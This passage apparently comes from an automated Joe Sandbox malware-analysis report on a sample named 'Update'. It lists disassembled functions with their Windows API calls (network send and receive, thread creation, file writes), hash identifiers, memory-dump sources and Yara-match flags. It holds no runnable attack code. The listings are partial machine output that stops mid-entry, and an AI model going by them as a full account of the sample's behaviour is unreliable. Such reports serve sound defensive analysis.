                                                                                            • Instruction Fuzzy Hash: 35619072914119EFDF01CFE8C844AEEBBB9EF4A308F140189E950A7645D332D926CFA1
                                                                                            Function 6C37A8B0 Relevance: 3.2, APIs: 2, Instructions: 173COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __fread_nolock
                                                                                            • String ID:
                                                                                            • API String ID: 2638373210-0
                                                                                            • Opcode ID: bb58a6a0a802cbbd7d4787d1b2aa3885e63c8cef58e2f1b244c96a4b348c1e1e
                                                                                            • Instruction ID: 72b3564e246b8f9ae1eabee60b055bf473d4ab7fac7b3b4754ca911924c75e25
                                                                                            • Opcode Fuzzy Hash: bb58a6a0a802cbbd7d4787d1b2aa3885e63c8cef58e2f1b244c96a4b348c1e1e
                                                                                            • Instruction Fuzzy Hash: 845105327042148FC7648E2DC880B1AB3E5AF89718F16966DF899CB790D736DC15CFA5
                                                                                            Function 10003350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time_memmovetime
                                                                                            • String ID:
                                                                                            • API String ID: 1463837790-0
                                                                                            • Opcode ID: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                                            • Instruction ID: 7472951ecdc6142c721ad3348498c8fe017ad8d952fa801f9fd3c423b9f36496
                                                                                            • Opcode Fuzzy Hash: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                                            • Instruction Fuzzy Hash: A5519F767006029FE316CF69C8C0A9BB7A9FF48294715C669E919CB709DB31FC51CB90
                                                                                            Function 6C371A30 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 137sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C393EF1: GetSystemTimeAsFileTime.KERNEL32(6C371A64,?,?,?,?,?,6C371A64,00000000), ref: 6C393F06
                                                                                              • Part of subcall function 6C393EF1: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C393F25
                                                                                            • Sleep.KERNEL32(00000064), ref: 6C371B6C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: gfff
                                                                                            • API String ID: 2563648476-1553575800
                                                                                            • Opcode ID: f29dd931424788968dd50fb0b5b850cf296d921a5c41a874d51e38641d0e1c79
                                                                                            • Instruction ID: 92627441bedaec059d381e668436942cc82426d78cb9766e3955c3eb0694bc6e
                                                                                            • Opcode Fuzzy Hash: f29dd931424788968dd50fb0b5b850cf296d921a5c41a874d51e38641d0e1c79
                                                                                            • Instruction Fuzzy Hash: 5051D7B2D002488FDB20CFB9D8247EDBBB4EB45319F048229D419E7790E7799549CFA6
                                                                                            Function 6C38CE1B Relevance: 3.1, APIs: 2, Instructions: 92COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __RTC_Initialize.LIBCMT ref: 6C38CE68
                                                                                              • Part of subcall function 6C38D21A: InitializeSListHead.KERNEL32(6C3BCA10,6C38CE72,6C3B9C08,00000010,6C38D00B,?,00000000,?,00000007,6C3B9C28,00000010,6C38D01E,?,?,6C38D0A7,?), ref: 6C38D21F
                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C38CED2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                            • String ID:
                                                                                            • API String ID: 3231365870-0
                                                                                            • Opcode ID: a16907a1ce6f9783ef2c076036ac13694c6dd4713412e646d7635ddd80679a6c
                                                                                            • Instruction ID: c987f161d2627508082c3c6e58d2b09101fbcebb0196af6cd8f2477c7f6493cc
                                                                                            • Opcode Fuzzy Hash: a16907a1ce6f9783ef2c076036ac13694c6dd4713412e646d7635ddd80679a6c
                                                                                            • Instruction Fuzzy Hash: 8A21F6322472419ADB00BFB8B4007D837B0AF567AEF14495AD4C567EC1DB3660098F6A
                                                                                            Function 034E2FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 034E3043
                                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 034E3064
                                                                                              • Part of subcall function 034EF91B: __getptd_noexit.LIBCMT ref: 034EF91B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexitrecvselect
                                                                                            • String ID:
                                                                                            • API String ID: 4248608111-0
                                                                                            • Opcode ID: 28ed305741bda30244d26284ffc237879ab21f12c9ee9edfccb96fac41358fac
                                                                                            • Instruction ID: 85c248e0bf32bf7a0f85a2f3943eb46d15cad4a126cf1bd48442978bfcccd45f
                                                                                            • Opcode Fuzzy Hash: 28ed305741bda30244d26284ffc237879ab21f12c9ee9edfccb96fac41358fac
                                                                                            • Instruction Fuzzy Hash: 2621E4745003089FDB31EF65DC88B9B73A4EF04313F0905EAE9445F294D770A984CBA9
                                                                                            Function 10002FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003023
                                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 10003044
                                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexitrecvselect
                                                                                            • String ID:
                                                                                            • API String ID: 4248608111-0
                                                                                            • Opcode ID: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                                            • Instruction ID: 1cbb114b02e0d86a534962cf0a51f77a1151a50c8d60f66bd4e8238187776ab9
                                                                                            • Opcode Fuzzy Hash: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                                            • Instruction Fuzzy Hash: 7F21E770A01318EBFB11DF64DC95B9B73B8EF053D0F1081A5E5095B199DBB1AD84CBA1
                                                                                            Function 6C3A19F5 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6C3A1387,?,6C3AA281,6C3A07FB,00000000,6C3A07FB,00000000), ref: 6C3A1A91
                                                                                            • GetLastError.KERNEL32(?,6C3A1387,?,6C3AA281,6C3A07FB,00000000,6C3A07FB,00000000,00000000,?,6C3AB0A5,00000000,00000000,6C3AAFE2,6C3A07FB,00000000), ref: 6C3A1AB7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: a6c79c76d1f828934594fc46fbda7085362bdd7a5b487ef8b2080f9555efc4b8
                                                                                            • Instruction ID: cf469436d69901c19bd0f3447a9bf161771a047ed4bec3c2bc2a9e8c564f6ba5
                                                                                            • Opcode Fuzzy Hash: a6c79c76d1f828934594fc46fbda7085362bdd7a5b487ef8b2080f9555efc4b8
                                                                                            • Instruction Fuzzy Hash: 3B21D131A11258DFCB19CF69CC80ADAB7BAEB49305F1441AAE906D7351D730DE46CF61
                                                                                            Function 6C381070 Relevance: 3.1, APIs: 2, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6C381124
                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C38115F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFileIos_base_dtorstd::ios_base::_
                                                                                            • String ID:
                                                                                            • API String ID: 2738015347-0
                                                                                            • Opcode ID: 57576b43aa49c8e9619939d247be880536b9334e7a293e54a1be974fbd92addc
                                                                                            • Instruction ID: 28893cb7df3a97a72b4f850c52edd963b810e323d529942b376c42aea3424255
                                                                                            • Opcode Fuzzy Hash: 57576b43aa49c8e9619939d247be880536b9334e7a293e54a1be974fbd92addc
                                                                                            • Instruction Fuzzy Hash: F0314975611B009FE724CF28C845B86BBE5FB49724F008A1CE5AA8B791C771F944CF91
                                                                                            Function 6C38CF22 Relevance: 3.1, APIs: 2, Instructions: 75COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __RTC_Initialize.LIBCMT ref: 6C38CF69
                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6C38CF83
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                            • String ID:
                                                                                            • API String ID: 2442719207-0
                                                                                            • Opcode ID: 5448dbffc7bbd35da002696cf49264a5f0997d4db036bfaa14897aba0c0a3734
                                                                                            • Instruction ID: e52f0683f1695332e4c890d169447f5109937d055bbf104d394adc546befe47c
                                                                                            • Opcode Fuzzy Hash: 5448dbffc7bbd35da002696cf49264a5f0997d4db036bfaa14897aba0c0a3734
                                                                                            • Instruction Fuzzy Hash: 9D21D573A0B2569BDB00BFB8B4007DD77B4EB0671DF10861BE08096F81DB7595058F66
                                                                                            Function 034E3260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • send.WS2_32(?,?,00040000,00000000), ref: 034E3291
                                                                                            • send.WS2_32(?,?,?,00000000), ref: 034E32CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: send
                                                                                            • String ID:
                                                                                            • API String ID: 2809346765-0
                                                                                            • Opcode ID: 99fca322e1a700657814ec646a40b173799473c6d778bd336f3dbcce07f03334
                                                                                            • Instruction ID: 2df885476b435f795ce04f701e235a7ca0fd750e630f9c95a4c388e04419b838
                                                                                            • Opcode Fuzzy Hash: 99fca322e1a700657814ec646a40b173799473c6d778bd336f3dbcce07f03334
                                                                                            • Instruction Fuzzy Hash: D911E57AB01304ABC721CE6BDC88B5BB799FB81365F148067F988DF280D27199419658
                                                                                            Function 6C39FE7C Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,?,00008000,6C37BBBA,00008000,6C3A07FB,?,?,?,6C39FD04,6C3A07FB,?,00000000,6C37BBBA,?), ref: 6C39FEB8
                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,6C39FD04,6C3A07FB,?,00000000,6C37BBBA,?,00000000,00008000,6C3A07FB,?,?,6C3A9C04), ref: 6C39FEC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
                                                                                            • Opcode ID: 50a3723a3d30523646b9ca8d43386dcdf7f699b9ff9d5315a6f78bbd6eea7a5c
                                                                                            • Instruction ID: 9c4e70e89692a5efc3b33568fc2f5b7f09c7b868814b0470fe527aa5d5567134
                                                                                            • Opcode Fuzzy Hash: 50a3723a3d30523646b9ca8d43386dcdf7f699b9ff9d5315a6f78bbd6eea7a5c
                                                                                            • Instruction Fuzzy Hash: 8501D632A14655AFCF058F59CC0989E3B79DF86374B240248F8119B6D1F672DD51CFA0
                                                                                            Function 034E30E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: SleepTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 346578373-0
                                                                                            • Opcode ID: ec0629df6995d67ec7547a862065d3f080f68fd9b0fe6479acf76e43a1939410
                                                                                            • Instruction ID: 089b2587dc0e8d1ba51f887a816a2020b3942cb8be198726b0444c3b90d7886c
                                                                                            • Opcode Fuzzy Hash: ec0629df6995d67ec7547a862065d3f080f68fd9b0fe6479acf76e43a1939410
                                                                                            • Instruction Fuzzy Hash: BE01D439200206AFD312DF69C8C8B7EF7A5FB59302F18426AD1044B290C731A9C6CBD5
                                                                                            Function 100030C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: SleepTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 346578373-0
                                                                                            • Opcode ID: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                                            • Instruction ID: 27fac5dcdbeed923c3366fb10e8a319fa95706dbc2a1d72b4a6ad2049d896b26
                                                                                            • Opcode Fuzzy Hash: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                                            • Instruction Fuzzy Hash: B501DF31A00206AFE302DF65C8C4BABB3F9FB99381F108624D1018B294C771ADD6C7E1
                                                                                            Function 034ECD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,034EE04E,00000000,034E9800,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034ECD1B
                                                                                            • _free.LIBCMT ref: 034ECD56
                                                                                              • Part of subcall function 034E1280: __CxxThrowException@8.LIBCMT ref: 034E1290
                                                                                              • Part of subcall function 034E1280: DeleteCriticalSection.KERNEL32(00000000,034ED3E6,03506624,?,?,034ED3E6,?,?,?,?,03505A40,00000000), ref: 034E12A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                            • String ID:
                                                                                            • API String ID: 1116298128-0
                                                                                            • Opcode ID: 6058a9e21bacb8a9521628b6b69abc302ef3ab7ff74d255d3a681fc9d0e65d76
                                                                                            • Instruction ID: 1181dca282f0c789feee965d3b6cd5db126e6bbbf0f31d94177dc2bbabbc4ed4
                                                                                            • Opcode Fuzzy Hash: 6058a9e21bacb8a9521628b6b69abc302ef3ab7ff74d255d3a681fc9d0e65d76
                                                                                            • Instruction Fuzzy Hash: 76017EB0A00B408FC330DF6A9884A17FAE8BF98701B104A1FD2DACAB20D375A506CF55
                                                                                            Function 10006410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,10005AF2), ref: 1000642B
                                                                                            • _free.LIBCMT ref: 10006466
                                                                                              • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
                                                                                              • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                            • String ID:
                                                                                            • API String ID: 1116298128-0
                                                                                            • Opcode ID: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                                            • Instruction ID: d75aab6d42964042dd9719b22c7254e4122bf8c787039a32894d973a0e8f9c7d
                                                                                            • Opcode Fuzzy Hash: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                                            • Instruction Fuzzy Hash: D6017EF4A00B408FD321CF6A8884A47FAF9FF98750B104A1EE2DAC7A10D770A545CF55
                                                                                            Function 034EE480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00000000,034EDF10,00000000,00000000,00000000), ref: 034EE49B
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,034F1168,?,?,?,?,?,?,03506298,0000000C,034F1210,?), ref: 034EE4A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateObjectSingleThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 1891408510-0
                                                                                            • Opcode ID: 23c9603334f8c7cc7935502a99e0de74686a78cde0f14afa64dffc01ff2f247a
                                                                                            • Instruction ID: cfc9b961b0f74a81a67f0d0f5f8bb77733db7c0ce8fa8157ad3de51c82f96790
                                                                                            • Opcode Fuzzy Hash: 23c9603334f8c7cc7935502a99e0de74686a78cde0f14afa64dffc01ff2f247a
                                                                                            • Instruction Fuzzy Hash: 6BE05BB2444209BFDF10FB54EC88E3B73DCD704335B104756BA24C6369E5719985AA64
                                                                                            Function 034EF983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 034EF98F
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                              • Part of subcall function 034EF964: __getptd_noexit.LIBCMT ref: 034EF969
                                                                                              • Part of subcall function 034EF964: __freeptd.LIBCMT ref: 034EF973
                                                                                              • Part of subcall function 034EF964: ExitThread.KERNEL32 ref: 034EF97C
                                                                                            • __XcptFilter.LIBCMT ref: 034EF9B0
                                                                                              • Part of subcall function 034F418F: __getptd_noexit.LIBCMT ref: 034F4195
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                            • String ID:
                                                                                            • API String ID: 418257734-0
                                                                                            • Opcode ID: 7e533bb9f64c489b5b6b7686450e3c26a8d21f53d572c8a21486e2386f2cef5c
                                                                                            • Instruction ID: 43b0e97b00116b46ea4d4351c5b6da764b0d6dfec60259209c3421dcec8acd8e
                                                                                            • Opcode Fuzzy Hash: 7e533bb9f64c489b5b6b7686450e3c26a8d21f53d572c8a21486e2386f2cef5c
                                                                                            • Instruction Fuzzy Hash: 4BE08CB8900300EFDB18FBA2D804E3E3734EF04602F20014EE2016F2A0CF399800DA24
                                                                                            Function 10007175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 10007181
                                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                                              • Part of subcall function 10007156: __getptd_noexit.LIBCMT ref: 1000715B
                                                                                              • Part of subcall function 10007156: __freeptd.LIBCMT ref: 10007165
                                                                                              • Part of subcall function 10007156: ExitThread.KERNEL32 ref: 1000716E
                                                                                            • __XcptFilter.LIBCMT ref: 100071A2
